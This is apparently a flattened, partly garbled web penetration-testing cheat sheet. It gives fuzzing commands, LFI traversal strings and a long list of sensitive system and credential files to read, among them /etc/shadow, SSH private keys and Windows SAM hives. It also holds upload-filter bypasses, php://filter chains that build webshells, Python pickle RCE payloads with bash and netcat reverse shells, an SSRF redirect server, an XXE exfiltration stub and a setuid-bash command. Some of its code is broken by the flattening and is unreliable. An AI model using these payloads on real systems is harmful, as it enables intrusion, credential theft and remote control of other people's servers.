Cismcissp Sheetcheet
ffuf API Fuzzing Searching for LFI
Fuzzing with PHP Session ID Recursion File Extensions Rate Limiting Virtual Host Discovery ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fs -mc all ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fw -mc all ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ -mc 200,204,301,302,307,401 -o results.txt ffuf -c
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http:/// -H "Host: FUZZ." -fs
185 ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u
http:///backups/backup_2020070416FUZZ.zip ffuf -u https:///api/v2/FUZZ -w api_seen_in_wild.txt -c -ac
-t 250 -fc 400,404,412 ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u
http:///admin../admin_staging/index.php?page=FUZZ -fs 15349 ffuf -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u
"http:///admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644 ffuf -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u
http:///cd/basic/FUZZ -recursion ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-
list-2.3-small.txt -u http:///cd/ext/logs/FUZZ -e .log ffuf -w /usr/share/wordlists/seclists/Discovery/Web-
Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http:///cd/rate/FUZZ -mc 200,429
Massive File Extension Discovery
GitTools ./gitdumper.sh http:///.git/ /PATH/TO/FOLDER ./extractor.sh /PATH/TO/FOLDER/
/PATH/TO/FOLDER/ Gobuster Common File Extensions txt,bak,php,html,js,asp,aspx Common Picture
Extensions png,jpg,jpeg,gif,bmp POST Requests ffuf -w
/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." -u
http:// -fs 1495 ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http:///FUZZ -t 30 -c
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc
200,204,301,302,307,401,403,500 -ic -
e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.do
t,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.pht
ml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.
xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip -e // extended mode that renders the full url -k // skip ssl certificate
validation -r // follow redirects -s // status codes -b // exclude status codes -k // ignore certificates --
wildcard // set wildcard option $ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-
medium.txt -u http:/// $ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:/// -x
php $ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http:/// -x php,txt,html,js -e -s 200 $ gobuster
dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u
https://:/ -b 200 -k --wildcard gobuster dir -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u
http:///api/ -e -s 200
DNS Recon VHost Discovery Specify User Agent Local File Inclusion (LFI) http:///.php?file= http:///.php?
file=../../../../../../../../etc/passwd http:////php?file=../../../../../../../../../../etc/passwd Until php 5.3
http:////php?file=../../../../../../../../../../etc/passwd%00 Null Byte %00 0x00 Encoded Traversal
Strings ../ ..\ ..\/ %2e%2e%2f gobuster dns -d -w
/usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt gobuster dns -d -t 50 -
w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt gobuster vhost -u -t
50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt gobuster vhost -
u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-
domain gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// -a Linux
%252e%252e%252f
%c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ..././ ...\.\ php://filter Wrapper
https://tinyurl.com/yux6oqdu https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion
https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion#wrapper-phpfilter
url=php://filter/convert.base64-encode/resource=file:////var/www//api.php Django, Rails, or Node.js
Web Application Header Values Accept:
../../../../.././../../../../etc/passwd{{ Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{ Accept:
../../../../.././../../../../etc/passwd{%0A{{ Accept: ../../../../.././../../../../etc/passwd{%00{{ Linux Files
/etc/passwd /etc/shadow /etc/aliases /etc/anacrontab /etc/apache2/apache2.conf
/etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/at.allow http:///index.php?
page=php://filter/convert.base64-encode/resource=index
http:///index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd base64 -d .php
/etc/at.deny
/etc/bashrc /etc/bootptab /etc/chrootUsers /etc/chttp.conf /etc/cron.allow /etc/cron.deny
/etc/crontab /etc/cups/cupsd.conf /etc/exports /etc/fstab /etc/ftpaccess /etc/ftpchroot /etc/ftphosts
/etc/groups /etc/grub.conf /etc/hosts /etc/hosts.allow /etc/hosts.deny /etc/httpd/access.conf
/etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/access_log
/etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/php.ini
/etc/httpd/srm.conf /etc/inetd.conf /etc/inittab /etc/issue /etc/knockd.conf /etc/lighttpd.conf
/etc/lilo.conf /etc/logrotate.d/ftp /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/lsb-release
/etc/motd /etc/modules.conf /etc/motd /etc/mtab /etc/my.cnf /etc/my.conf /etc/mysql/my.cnf
/etc/network/interfaces /etc/networks /etc/npasswd
/etc/passwd /etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini /etc/php4/apache/php.ini /etc/php4/cgi/php.ini
/etc/php4/apache2/php.ini /etc/php5/apache2/php.ini /etc/php5/apache/php.ini
/etc/php/apache2/php.ini /etc/php/apache/php.ini /etc/php/cgi/php.ini /etc/php.ini
/etc/php/php4/php.ini /etc/php/php.ini /etc/printcap /etc/profile /etc/proftp.conf
/etc/proftpd/proftpd.conf /etc/pure-ftpd.conf /etc/pureftpd.passwd /etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/putreftpd.pdb /etc/redhat-
release /etc/resolv.conf /etc/samba/smb.conf /etc/snmpd.conf /etc/ssh/ssh_config
/etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/sysconfig/network /etc/syslog.conf
/etc/termcap /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /logs/pure-
ftpd.log /logs/security_debug_log /logs/security_log /opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini /proc/cmdline
/proc/cpuinfo /proc/filesystems /proc/interrupts /proc/ioports /proc/meminfo /proc/modules
/proc/mounts /proc/net/arp /proc/net/tcp /proc/net/udp /proc//cmdline /proc//maps
/proc/sched_debug /proc/self/cwd/app.py /proc/self/environ /proc/self/net/arp /proc/stat
/proc/swaps /proc/version /root/anaconda-ks.cfg /usr/etc/pure-ftpd.conf /usr/lib/php.ini
/usr/lib/php/php.ini /usr/local/apache/conf/modsec.conf /usr/local/apache/conf/php.ini
/usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log /usr/local/apache/audit_log /usr/local/apache/error_log
/usr/local/apache/error.log /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/lib/php.ini
/usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini /usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini /usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn /usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log /usr/local/Zend/etc/php.ini /usr/sbin/pure-config.pl
/var/adm/log/xferlog /var/apache2/config.inc /var/apache/logs/access_log
/var/apache/logs/error_log /var/cpanel/cpanel.config /var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD /var/local/www/conf/php.ini /var/log/apache2/access_log
/var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log
/var/log/apache/access_log /var/log/apache/access.log /var/log/apache/error_log
/var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log
/var/log/auth.log /var/log/boot /var/htmp /var/log/chttp.log /var/log/cups/error.log
/var/log/daemon.log /var/log/debug /var/log/dmesg /var/log/dpkg.log /var/log/exim_mainlog
/var/log/exim/mainlog /var/log/exim_paniclog /var/log/exim.paniclog /var/log/exim_rejectlog
/var/log/exim/rejectlog /var/log/faillog /var/log/ftplog
/var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log
/var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log /var/log/kern.log /var/log/lastlog /var/log/lighttpd/access.log
/var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log
/var/log/mail.info /var/log/mail.log /var/log/maillog /var/log/mail.warn /var/log/message
/var/log/messages /var/log/mysqlderror.log /var/log/mysql.log /var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/proftpd /var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log /var/log/secure /var/log/vsftpd.log /var/log/wtmp /var/log/xferlog
/var/log/yum.log /var/mysql.log /var/run/utmp /var/spool/cron/crontabs/root
/var/webmin/miniserv.log /var/www/html/__init__.py /var/www/html/db_connect.php
/var/www/html/utils.php /var/www/log/access_log /var/www/log/error_log /var/www/logs/access_log
/var/www/logs/error_log /var/www/logs/access.log /var/www/logs/error.log ~/.atfp_history
~/.bash_history
~/.bash_logout ~/.bash_profile ~/.bashrc ~/.gtkrc ~/.login ~/.logout ~/.mysql_history ~/.nano_history
~/.php_history ~/.profile ~/.ssh/authorized_keys ~/.ssh/id_dsa ~/.ssh/id_dsa.pub ~/.ssh/id_rsa
~/.ssh/id_rsa.pub ~/.ssh/identity ~/.ssh/identity.pub ~/.viminfo ~/.wm_style ~/.Xdefaults ~/.xinitrc
~/.Xresources ~/.xsession Windows Files C:/Users/Administrator/NTUser.dat C:/Documents and
Settings/Administrator/NTUser.dat C:/apache/logs/access.log C:/apache/logs/error.log
C:/apache/php/php.ini C:/boot.ini C:/inetpub/wwwroot/global.asa C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err C:/MySQL/data/mysql.log C:/MySQL/my.cnf C:/MySQL/my.ini C:/php4/php.ini
C:/php5/php.ini C:/php/php.ini C:/Program Files/Apache Group/Apache2/conf/httpd.conf C:/Program
Files/Apache Group/Apache/conf/httpd.conf C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err C:/Program Files/MySQL/data/mysql-bin.log C:/Program
Files/MySQL/data/mysql.err C:/Program Files/MySQL/data/mysql.log C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log C:/Program Files/MySQL/MySQL Server
5.0/data/mysql.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log C:/Program
Files/MySQL/MySQL Server 5.0/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/my.ini C:/Program
Files (x86)/Apache Group/Apache2/conf/httpd.conf C:/Program Files (x86)/Apache
Group/Apache/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log C:/Program Files (x86)/FileZilla
Server/FileZilla Server.xml C:/Program Files (x86)/xampp/apache/conf/httpd.conf C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM C:/Windows/repair/system C:/Windows/repair/software
C:/Windows/repair/security C:/WINDOWS/System32/drivers/etc/hosts C:/Windows/win.ini
C:/WINNT/php.ini C:/WINNT/win.ini C:/xampp/apache/bin/php.ini C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log PDF
PHP Inclusion Create a file with a PDF header, which contains PHP code. %PDF-1.4 http:///index.php?
page=uploads/.pdf%00&cmd=whoami PHP Upload Filter
Bypasses .sh .cgi .inc .txt .pht .phtml .phP .Php .php3 .php4 .php5 .php7 .pht .phps .phar .phpt .pgif .pht
ml .phtm .php%00.jpeg .php%20 .php%0d%0a.jpg .php%0a .php.jpg
.php%00.gif .php\x00.gif .php%00.png .php\
x00.png .php%00.jpg .php\x00.jpg mv .jpg .php\x00.jpg PHP Filter Chain Generator
https://tinyurl.com/yv3gjun7 PHP Generic Gadget Chains (PHPGGC) phpggc -u --fast-destruct
Guzzle/FW1 /dev/shm/.txt /PATH/TO/FILE/.txt Server-Side Request Forgery (SSRF) https:///item/2?
server=server./file?id=9&x= Server-Side Template Injection (SSTI) Fuzz String
https://tinyurl.com/ypta53z7 python3 php_filter_chain_generator.py --chain '' python3
php_filter_chain_generator.py --chain "" python3 php_filter_chain_generator.py --chain """""" python3
php_filter_chain_generator.py --chain """""""" python3 php_filter_chain_generator.py --chain """"""""
http:///?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKT
sgPz4 python3 php_filter_chain_generator.py --chain '' [+] The following gadget chain will generate the
following code : (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|
convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=
${{ -->
command: chmod +s /bin/bash Exploit Skeleton
Python Script #!/usr/bin/python import socket,sys address = '127.0.0.1' port = 9999 buffer = #TBD try:
print '[+] Sending buffer' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address,port)) s.recv(1024) s.send(buffer + '\r\n') except: print '[!] Unable to connect to the
application.' sys.exit(0) finally: s.close() JSON POST Request POST / HTTP/1.1 Host: User-Agent:
Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-
US,en;q=0.5 Content-Type: application/json Content-Length: 95 Connection: close { "auth":{ "name":"",
"password":"" }, "filename":"" }
Python Pickle RCE import base64 import pickle import os class RCE: def __reduce__(self):
cmd = ("/bin/bash -c 'exec bash -i &>/dev/tcp// <&1'") return = os.system, (cmd, ) if __name__ ==
'__main__': pickle = pickle.dumps(RCE()) print(bas64.b64encode(pickled)) Python Redirect for SSRF
#!/usr/bin/python3 import sys from http.server import HTTPServer, BaseHTTPRequestHandler class
Redirect(BaseHTTPRequestHandler): def do_GET(self): self.send_response(302)
self.send_header('Location', sys.argv[1]) self.end_headers() HTTPServer(("0.0.0.0", 80),
Redirect).serve_forever() import pickle import sys import base64 command = 'rm /tmp/f; mkfifo /tmp/f;
cat /tmp/f | /bin/sh -i 2>&1 | netcat > /tmp/f' class rce(object): def __reduce__(self): import os return
(os.system,(command,)) print(base64.b64encode(pickle.dumps(rce())))
sudo python3 redirect.py https://tinyurl.com/yjs6w2
#!/usr/bin/env python import SimpleHTTPServer import SocketServer import sys import argparse def
redirect_handler_factory(url): """ returns a request handler class that redirects to supplied `url` """ class
RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self):
self.send_response(301) self.send_header('Location', url) self.end_headers() def do_POST(self):
self.send_response(301) self.send_header('Location', url) self.end_headers() return RedirectHandler def
main(): parser = argparse.ArgumentParser(description='HTTP redirect server') parser.add_argument('--
port', '-p', action="store", type=int, default=80, help='port to listen on' parser.add_argument('--ip', '-i',
action="store", default="", help='host interface to listen on' parser.add_argument('redirect_url',
action="store") myargs = parser.parse_args() redirect_url = myargs.redirect_url port = myargs.port host =
myargs.ip redirectHandler = redirect_handler_factory(redirect_url) handler =
SocketServer.TCPServer((host, port), redirectHandler) print("serving at port %s" % port)
Python Web Request XML External
Entity (XXE) Request SYSTEM "http:///.dtd">%;]> GET / ; Content of .dtd handler.serve_forever() if
__name__ == "__main__": main() import requests import re http_proxy = "https://tinyurl.com/hdorn"
proxyDict = { "http" : http_proxy, } // get a session r = requests.get('http://') // send request r =
requests.post('', data={'key': 'value'}, cookies={'PHPSESSID': r.cookies['PHPSESSID']} , proxies=proxyDict)
%eval; %exfiltrate;